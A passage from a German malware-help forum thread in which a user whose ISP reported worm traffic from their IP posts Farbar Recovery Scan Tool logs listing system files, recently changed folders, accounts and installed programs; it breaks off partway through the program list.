C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll 2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll 2017-07-11 20:53 - 2017-06-20 07:12 - 000231936 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll 2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll 2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll 2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000497152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000208384 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll 2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll 2017-07-11 20:53 - 2017-06-20 07:08 - 000251392 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe 2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys 2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll 2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll 2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 004447744 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 001468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl 2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll 2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe 2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll 2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll 2017-07-11 20:53 - 2017-06-20 07:03 - 001396224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 003204096 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 002804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 004396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 000809984 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll 2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll 2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll 2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll 2017-07-11 20:53 - 2017-06-20 06:59 - 001357824 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2017-07-11 20:53 - 2017-06-20 06:58 - 000625152 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll 2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe 2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll 2017-07-11 20:53 - 2017-06-20 06:56 - 000600064 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv 2017-07-11 20:53 - 2017-06-20 06:54 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll 2017-07-09 18:39 - 2017-07-09 18:55 - 000000000 ____D C:\Users\****\Documents\SimCity 2017-07-09 18:26 - 2017-07-09 18:59 - 000001008 _____ C:\Users\Public\Desktop\SimCity™.lnk 2017-07-09 18:26 - 2017-07-09 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™ ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-08-06 01:14 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA 2017-08-06 01:14 - 2017-03-23 02:42 - 000000000 ____D C:\FRST 2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Roaming\Spotify 2017-08-06 01:14 - 2016-07-13 19:39 - 000000000 ____D C:\Users\****\AppData\Local\Spotify 2017-08-06 01:11 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-08-06 01:11 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-08-06 01:11 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI 2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2 2017-08-06 00:58 - 2017-04-19 20:20 - 003861696 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-08-06 00:58 - 2017-03-20 06:35 - 001882280 _____ C:\WINDOWS\system32\perfh007.dat 2017-08-06 00:58 - 2017-03-20 06:35 - 000473418 _____ C:\WINDOWS\system32\perfc007.dat 2017-08-06 00:53 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF 2017-08-06 00:52 - 2017-04-19 20:10 - 000000000 ____D C:\Users\**** 2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java 2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle 2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk 2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\****\AppData\Roaming\MyPhoneExplorer 2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit 2017-08-06 00:19 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit 2017-08-06 00:19 - 2015-03-15 23:24 - 000000000 ____D C:\Users\****\AppData\Roaming\IObit 2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\****\AppData\Local\Battle.net 2017-08-06 00:02 - 2015-03-09 00:28 - 000000000 ____D C:\Users\****\AppData\Local\Ubisoft Game Launcher 2017-08-05 23:39 - 2016-01-03 14:51 - 000000000 ____D C:\Users\****\AppData\Local\CrashDumps 2017-08-05 23:31 - 2015-03-01 21:28 - 000000000 ____D C:\Users\****\AppData\Roaming\Skype 2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache 2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games 2017-08-05 23:17 - 2015-03-15 23:24 - 000000000 ____D C:\ProgramData\ProductData 2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM 2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe 2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe 2017-08-05 22:55 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598} 2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps 2017-08-05 22:55 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness 2017-08-05 01:39 - 2015-04-10 22:33 - 000000000 ____D C:\Users\****\AppData\Roaming\TS3Client 2017-08-05 00:32 - 2015-02-07 15:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Dropbox 2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin 2017-08-03 02:07 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\****\AppData\Local\Dropbox 2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\****\Dropbox 2017-08-01 12:29 - 2017-05-17 19:05 - 000000000 ____D C:\Users\****\AppData\Local\b95cd 2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache 2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\****\AppData\Roaming\Mozilla 2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\****\AppData\Local\Google 2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google 2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\****\AppData\Roaming\Origin 2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin 2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\****\Documents\Darkest 2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\****\Documents\The Witcher 3 2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient 2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech 2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox 2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech 2017-07-31 19:59 - 2015-02-06 18:49 - 000000000 ____D C:\Users\****\AppData\Local\Packages 2017-07-31 19:41 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp 2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation 2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT 2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation 2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk 2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk 2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Roaming\discord 2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\****\AppData\Local\Discord 2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll 2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll 2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll 2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat 2017-07-24 19:38 - 2015-02-06 20:39 - 000000000 ____D C:\Users\****\AppData\Local\Turbine 2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll 2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll 2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat 2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype 2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com] 2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin 2017-07-12 19:33 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender 2017-07-11 20:56 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT 2017-07-11 20:54 - 2015-02-06 20:57 - 135225752 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-07-07 22:12 - 2017-03-31 20:13 - 000000000 ____D C:\Users\****\AppData\Local\Warframe ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\****\AppData\Local\recently-used.xbel 2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc 2015-11-02 23:41 - 2015-11-02 23:41 - 000000098 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat Dateien, die verschoben oder gelöscht werden sollten: ==================== C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat Einige Dateien in TEMP: ==================== 2017-08-06 00:26 - 2017-08-06 00:26 - 000066048 _____ () C:\Users\****\AppData\Local\Temp\Execute2App.exe 2017-08-05 23:51 - 2017-05-12 00:34 - 000037376 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiPatchSelfUpdateWindow.exe 2017-08-05 23:51 - 2017-05-12 00:03 - 000020480 _____ (Microsoft) C:\Users\****\AppData\Local\Temp\HiRezLauncherControls.dll 2017-08-06 00:27 - 2017-08-06 00:27 - 000740416 _____ (Oracle Corporation) C:\Users\****\AppData\Local\Temp\jre-8u144-windows-au.exe 2017-08-06 00:26 - 2016-12-09 09:03 - 000568832 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcp90.dll 2017-08-06 00:26 - 2016-12-09 09:03 - 000655872 _____ (Microsoft Corporation) C:\Users\****\AppData\Local\Temp\msvcr90.dll ==================== Bamital & volsnap ====================== (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG C:\WINDOWS\explorer.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert C:\WINDOWS\system32\services.exe => Datei ist digital signiert C:\WINDOWS\system32\User32.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert LastRegBack: 2017-08-01 03:15 ==================== Ende von FRST.txt ============================ |
06.08.2017, 00:28 | #19 |
| UPC meldet: Virus, würmer werden über meine IP versendet Und die andere. Hoffe dass die jetzt in eine Datei passt.. Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 31-07-2017 durchgeführt von ***** (06-08-2017 01:16:42) Gestartet von C:\Users\*****\Desktop Windows 7 Ultimate (X64) (2017-04-19 18:18:33) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled) DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled) Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled) ***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\***** ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version: - Akamai Technologies, Inc) Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version: - Studio Wildcard) Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology) AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software) CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform) Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com) Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.) Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts) Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 31.4.25 - Dropbox, Inc.) Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD) Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version: - Frontier Developments) Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version: - Frontier Developments) Endless Space (HKLM-x32\...\Steam App 208140) (Version: - AMPLITUDE Studios) erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden EVE Online (HKLM\...\Steam App 8500) (Version: - CCP) Fallout 4 (HKLM-x32\...\Steam App 377160) (Version: - Bethesda Game Studios) ForHonor (HKLM-x32\...\Uplay Install 569) (Version: - Ubisoft) Galactic Civilizations III (HKLM\...\Steam App 226860) (Version: - Stardock Entertainment) GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.78 - Google Inc.) Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version: - NCsoft Corporation, Ltd.) Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment) HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios) Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios) Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation) Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation) Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation) KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios) KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment) Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.) Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech) Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.) Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden Master of Orion (HKLM\...\Steam App 298050) (Version: - NGD Studios) Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation) Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation) Microsoft LifeCam 